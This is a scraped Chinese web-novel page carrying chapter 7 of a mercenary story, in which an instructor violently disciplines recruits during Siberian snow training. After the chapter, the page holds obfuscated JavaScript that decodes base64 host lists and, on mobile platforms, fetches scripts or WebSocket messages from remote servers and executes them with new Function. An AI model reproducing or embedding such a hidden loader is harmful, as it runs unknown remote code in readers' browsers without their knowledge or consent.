笔趣阁

字:
关灯 护眼
笔趣阁 > 战场合同工 > 第七章 耐心

第七章 耐心

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
    西伯利亚的雪是结晶的颗粒状,落到人的脸上甚至有些微微的疼痛。
  
      昆汀这个黑人拔出了腰间的那把刀,这把刀的形状有些怪异,和一般的精工细作的军用刀具相比显得粗鄙而简陋。
  
      昆汀像是在自言自语地道,“这把刀跟了我很久。它不是什么好刀,只是用来收割香蕉的。但是这把刀却无数次把我从死亡的边缘拉了回来。我在大屠杀中活了下来,所以靠的除了这把刀,就是忍耐和警觉。”
  
      那个之前高喊着不想干了的年轻人,看着这个阴郁得如同石头一样的黑人,已经有些脸色不好地后退。他似乎有些后悔刚才的冲动了,但是现在说什么都没用了。
  
      昆汀把那把刀插在雪地上,而就在同时,他的拳头已经砸在了那个年轻人的脸上。年轻人被打得一仰头的工夫,昆汀陡然抬起膝盖狠狠撞在他的腹部。
  
      那个年轻人哼都没有哼一声地倒下来了,他脸上的血溅在雪地上,触目惊心。
  
      昆汀一脚将他的头踩进了雪地里,喝道,“你知不知道,一个真正的图西族猎手为了一只猎物,要付出多少代价?我曾经光着脚追逐一头羚羊,在非洲的烈日之下连续四五个小时不停地奔跑。等我用长矛刺穿那头羚羊的躯体时,它甚至已经站着不动了,因为它已经精疲力竭。”
  
      那个被踩在雪地里的人努力挣扎着想要抬起头,但是却被死死地踩在雪地上。
  
      这些佣兵们学员个个都惊惶了起来,林锐更是起身喝道,“够了,你这样会杀了他的!”他的一把握住了昆汀的手腕。
  
      昆汀看了他一眼,甩开他的手,冷冷地道,“羚羊跑得很快,至少比人要快多了,但是你知道我为什么能够追上它?足迹,气息,它啃食过的草,都是让它被我追到的原因。你以为我让你们趴在雪地里只是为了好玩么?我是在教你们,如何隐藏自己。学会警觉,学会忍耐,只有这样才能生存。战场规则很简单,在战场上的人只有两种选择,要么猎杀,要么被猎杀。”
  
      昆汀抬起了自己的脚,转过身看了林锐一眼,对他道,“你,扶着他继续回到雪地里趴着。你们两个人的训练时间各加一倍。对于他,必须训练耐性。而对于你,需要磨掉你身上的血性。冒失和冲动,每天有很多菜鸟军人都是死于这两个毛病。”
  
      “那,我们是不是可以走了?”秦奋有些试探着道。
  
      “不可以。因为这个人是你们的队友。而在队友遇到危险的时候,却只有他一个人站出来。”昆汀冷酷地一笑道,“这说明你们所有人都缺乏团队意识,所以都得留下。训练时间同样延长。”
  
      当这次训练结束的时候,林锐的双腿甚至已经被冻得失去了知觉,完全是强撑着走回了训练基地内部。他感觉自己迈动的两条腿几乎已经不是自己的了。他身边的其他人也没有比他好到哪里去,在这冰天雪地里趴在雪中,各个都冻得脸色发青。
  
      “你们所有人,全部去唐那里,接受检查。我可不想有人为此缺席下次的训练。”昆汀看了这些人一眼,冷冷地道。
  
      唐坤给他们检查了一遍,确定他们没事,才让这些佣兵学员各自回去。
  
      这时,赵建飞走了进来,看着昆汀笑了笑,“今天第一天,你对他们的感觉如何?”
  
      “一群垃圾而已。”昆汀冷冷地道。
  
      “也不完全是。”唐坤缓缓地道,“他们都接受过基本的军事训练,具备一定的素质,新人能有这样也算不错了。”
  
      “不过,那个中国小子有点意思。今天居然差点出手反抗我。”昆汀吸了一口烟缓缓地道。
  
      赵建飞耸耸肩道,“他们都是中国小子,你知道这批学员都是从中国来的。你说的是哪个,嗯,是林锐?”
  
      “抱歉,我还不很清楚他们的名字,不过应该就是那个。”昆汀看了他一眼道,“据说他一来就打败了白熊?”
  
      “算是吧,不过你并不是第一个看好他的人。”赵建飞缓缓地道,“他是银狼亲自招收的。”
  
      唐坤微微一怔,“米歇尔?”
  
      “嗯。你知道的,能被他看上眼的,绝对不会太差。行了,都休息吧,明天还得接着折腾这帮初哥。”赵建飞一笑转身走了出去。在外面的走廊上,他经过林锐的身边时,顺势拍了一下林锐的肩膀淡淡地道,“小子,过来一下,我有话跟你说。”
  
      赵建飞走在前面,林锐拖着沉重的双腿跟着他的身后,他几次想开口问赵建飞是什么事,但还是忍住了。
  
      地下基地的走廊狭窄而昏暗,仅仅靠着走廊顶部一盏昏黄的灯照明。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x57\x69\x77\x51\x4b\x69\x58\x4b\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNoZGtmamxhcy56aGl4aWFuZ2h1aWJhbby5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《战场合同工》
打开
浏览器
继续